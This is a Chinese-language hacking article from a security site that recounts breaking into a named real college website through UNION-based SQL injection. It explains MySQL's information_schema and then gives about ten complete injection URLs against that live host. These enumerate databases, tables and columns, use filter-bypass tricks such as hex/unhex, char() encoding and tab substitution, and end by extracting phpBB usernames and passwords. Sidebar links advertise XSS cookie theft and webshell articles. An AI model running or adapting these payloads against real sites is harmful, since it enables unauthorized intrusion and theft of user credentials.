首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
入侵纽约大学过程
来源:vfocus.net 作者:vfocus 发布时间:2011-05-17  
   一 原理分析
我看看mysql5比之前增加的系统数据库information_schema的结构,它是用来存储数据库系统信息的
mysql> use information_schema;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema |
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
这里只挑注射中可以用到的几个表。 
| SCHEMATA ――>存储数据库名的,
|——>关键字段:SCHEMA_NAME,表示数据库名称
| TABLES ――>存储表名的
|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示表的名称
| COLUMNS ――>存储字段名的
|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示所属的表的名称
          COLUMN_NAME表示字段名
二 注入过程
1 版本号:1:版本号http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20select%201,2,3,4,unhex(hex(@@version)),6,7,8,9,10,11/*(这里用hex unhex绕过错误)

2用户名:2:用户名http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20select%201,2,3,4,unhex(hex(user())),6,7,8,9,10,11/*

3数据库名:11:数据库库名:http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20select%201,2,3,4,unhex(hex(SCHEMA_NAME)),6,7,8,9,10,11%20from%20information_schema.SCHEMATA%20where%20SCHEMA_NAME%20like%20char(37,105,108,116,95,112,104,112,98,98,37)/* 这里我们找下phpbb的表段。(关键模糊查询,有些库名是很多的。甚至上百,模糊查询可以帮你找到你所希望的。例如:%pass%  %phpbb%等有用的表)

4段名:4:段名http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()/*(这里直接利用查询=database查询与用户有关的段)

5:避免限制limit的:http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()%20and%20table_name%20!=%20char(117,115,101,114,115%20)/*(有些情况下limit是被限制的 之类我们可以采用!=来绕过)
6:username:http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(column_name)),6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=char(117,115,101,114,115)%20limit%202,1/*
7:password:http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(column_name)),6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=char(117,115,101,114,115)%20limit%206,1/*(由于长度问题 这里显示不出来 经试验此表并不重要)
8 容错的:http://lrc.yorkcollege.ac.uk/subjects/display.php?id=-1%20union%09select%091,2,3,4,username,6,7,8,9,10,11%09from%09users/*(大家注意这条语句  很多情况下如果我们id=64 是不行的  这里64可换为-1 两外%20换为%09 多多注意哦 )
9模糊查询:http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_name%20like%20char(37,112,104,112,37)/*
10:结果:http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64+union+select+1,2,3,4,unhex(hex(concat(username,0x3a,user_password))),6,7,8,9,10,11+from+ilt_phpbb.phpbb_users


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·Mysql跨库入侵介绍
·Firefox攻击技巧总结
·linux不提权跨目录访问的代码
·1433终极入侵之沙盒模式
·用IIS6.0的文件解析缺陷留后门
·微软的“后门”:NTSD.exe,的远
·xss跨站脚本攻击大全
·Xss获取管理员后台地址实战
·伪静态注入中转
·XSS(跨站)偷cookie的代码
·XSS偷取密码Cookies通用脚本
·Blogbus XSS利用——XSS Worm
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved